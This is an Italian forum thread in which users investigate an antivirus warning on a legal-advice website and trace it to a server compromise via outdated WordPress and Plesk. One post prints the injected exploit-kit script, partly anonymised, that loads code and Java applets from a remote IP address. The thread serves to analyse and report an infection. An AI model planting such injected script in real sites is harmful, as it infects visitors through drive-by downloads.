JavaScript Obfuscation ( type 156 )

Se Windows genera un errore, hai un problema di virus o vuoi discutere/segnalare l'uscita della nuova versione di un software per la piattaforma Microsoft, questa è la sezione giusta.
Regole del forum
Rispondi
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Salve a tutti , eccoci di nuovo con le segnalazioni di AVG . Arrivo sul sito , AVG blocca la minaccia , questo il report delle maggiori informazioni :
This link on laleggepertutti.it is unsafe for browsing
http://www.laleggepertutti.it/
1 active threats have been detected on this link
JavaScript Obfuscation (type 156)
Navigation on this site is not recommended.
297 compromised pages have been found on laleggepertutti.
Il sito è molto buono , e questa è la pagina della reputazione di WOT : http://www.mywot.com/en/scorecard/www.l ... ertutti.it .
Potrebbe essere il “ solito “ java od uno script ? Oppure un’immagine o banner pubblicitario ? :grazie
Sono una fan dei componenti aggiuntivi
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: JavaScript Obfuscation ( type 156 )

Messaggio da System » sab giu 08, 2013 1:17 pm


Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Qual'é il link bloccato sul sito?
“The quieter you become, the more you can hear”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Non sembra ci siano link bloccati , al momento il sito si visita benissimo , ma deve stare protetto da intrusioni . Arrivo solo su alcune pagine e scatta il blocco della minaccia . Per questo ho pensato a banner pubblicitari od immagini . Ho trovato anche questo , non so quanto attendibile : http://www.wpitaly.it/forum/topic.php?id=15026 .
Sono una fan dei componenti aggiuntivi
Avatar utente
eDog
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 869
Iscritto il: gio mag 02, 2013 3:32 pm
Località: Vescovana (PD)

Re: JavaScript Obfuscation ( type 156 )

Messaggio da eDog »

Blumare ha scritto:1 active threats have been detected on this link
JavaScript Obfuscation (type 156)
Forse viene usato dello strano codice per impedire la lettura del codice js presente in quelle pagine.. :penso
eDog
I am convinced that He (God) does not play dice. - Albert Einstein
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Allora basterebbe cambiarlo , credo . Mentre una migrazione di traffico sospetta potrebbe indicare qualcosa che si nasconde ?
Sono una fan dei componenti aggiuntivi
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: JavaScript Obfuscation ( type 156 )

Messaggio da crazy.cat »

Anche collegandosi con Firefox basta aspettare e compare questo messaggio
Immagine
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Anche io mi collego con Firefox ( 21.0 , l’ultimo aggiornamento ! ) e quel messaggio non compare . Però somiglia all'avviso di quando si visita un sito che richiede Java e non lo si ha .
Sono una fan dei componenti aggiuntivi
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: JavaScript Obfuscation ( type 156 )

Messaggio da crazy.cat »

Blumare ha scritto:Però somiglia all'avviso di quando si visita un sito che richiede Java e non lo si ha .
Io ho Java e non faccio eseguire applicazioni a nessun sito che me lo richiede.
Codice nascosto da qualche parte direi pure io.
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Magari in qualche pubblicità od immagine . Nulla da segnalare collegandosi con altri browser come Opera , Safari , IE8 .
Sono una fan dei componenti aggiuntivi
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: JavaScript Obfuscation ( type 156 )

Messaggio da crazy.cat »

Con ie9 esce prima un errore di sintassi di java script e poi questo
Immagine
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Beccato:

Codice: Seleziona tutto

<script language="javascript">
    var ws = new Date();
    ws.setDate(14 + ws.getDate());
document.cookie = "stats=valore_cookie; path=/; expires=" + ws.toGMTString();
temp1 = "link_exploit_base64";
    temp2 = "jnlp_";
</script>
<script src="http://212.124.116.10:8080/perscorso/blabla"></script>
<script>
    var v = PluginDetect.getVersion('Java').split(',');
    if (v[1] == 7) {
      document.write('<applet height="10" width="10"><param name="' + temp2 + 'href" value="blablabla.jnlp" /><param name="' + temp2 + 'embedded" value="' + temp1 + '" /><param name="fuck_you" value="identificativo" /></applet>');
    } else {
        document.write('<object type="application/x-java-applet" name="xxxxxx" width="10" height="10"><param name="code" value="xxxxxx.blablabla.class" /><param name="archive" value="http://212.124.116.10:8080/percorso/2.zip" /><param name="abcevfalwqhvj" value="identificativo" /></object>');
    }
</script>
Sicuramente si tratta di un infezione che si avvale di un exploit kit come strumento di diffusione.
Il sito utilizza una versione di Wordpress non aggiornata (3.4.2), il server é Apache gestito da Plesk (é stata segnalata UNA vulnerabilitá 0-day 2 giorni fa).
Tutto ció comporta una compromissione del server, che inietta, a seconda del browser utilizzato, nel fondo della pagina, il contenuto mostrato sopra (anonimizzato per ovvie ragioni). :P

P.S.: Se desiderate, posto un link per il file jar dell'exploit.
“The quieter you become, the more you can hear”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Potrebbe essere utile , hashcat :clap ! Quindi , Wordpress da aggiornare , ma poi ? Non devono mica formattare e reinstallare tutto :doh , vero ? Mi pare eccessivo .
Sono una fan dei componenti aggiuntivi
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Il problema principale é PLESK (l'utilizzo di una versione obsoleta e vulnerabile del software), la responsabilitá della compromissione é dell'azienda che si occupa dell'hosting del sito.
“The quieter you become, the more you can hear”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Quindi è " solo " da aggiornare PLESK , ma non devono farlo loro ? Bene !
Sono una fan dei componenti aggiuntivi
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Credo di si, per appurarlo con certezza bisognerebbe verificare se l'iniezione di codice malevolo avviene anche per gli altri siti ospitati dal provider di servizi di hosting.
“The quieter you become, the more you can hear”
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

Ma questo non riguarda laleggepertutti.it ! Gli ho mandato il link a questa discussione , quindi :grazie
Ragazzi , Turbolab.it ha appena risolto il suo primo “ caso “ ! :P :clap
Sono una fan dei componenti aggiuntivi
Avatar utente
Blumare
Livello: Disco fisso (9/15)
Livello: Disco fisso (9/15)
Messaggi: 776
Iscritto il: sab mag 04, 2013 10:24 pm
Località: Firenze

Re: JavaScript Obfuscation ( type 156 )

Messaggio da Blumare »

E nel frattempo Al3x aveva già segnalato due giorni fa lo stesso “ Zero-Day “ : http://turbolab.it/forum/viewtopic.php?f=23&t=231 . :mrgreen:
Sono una fan dei componenti aggiuntivi
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Blumare ha scritto:E nel frattempo Al3x aveva già segnalato due giorni fa lo stesso “ Zero-Day “ : http://turbolab.it/forum/viewtopic.php?f=23&t=231 . :mrgreen:
L'avevo letto ma mi ero completamente dimenticato della sua esistenza.

Nel frattempo ho inviato il campione a VirusTotal ed ESET.
“The quieter you become, the more you can hear”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da hashcat »

Per completezza segnalo QUESTO post su Full Disclosure che descrive il processo di infezione causato dalla vulnerabilitá.
“The quieter you become, the more you can hear”
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Re: R: JavaScript Obfuscation ( type 156 )

Messaggio da System » dom giu 09, 2013 12:41 pm


Rispondi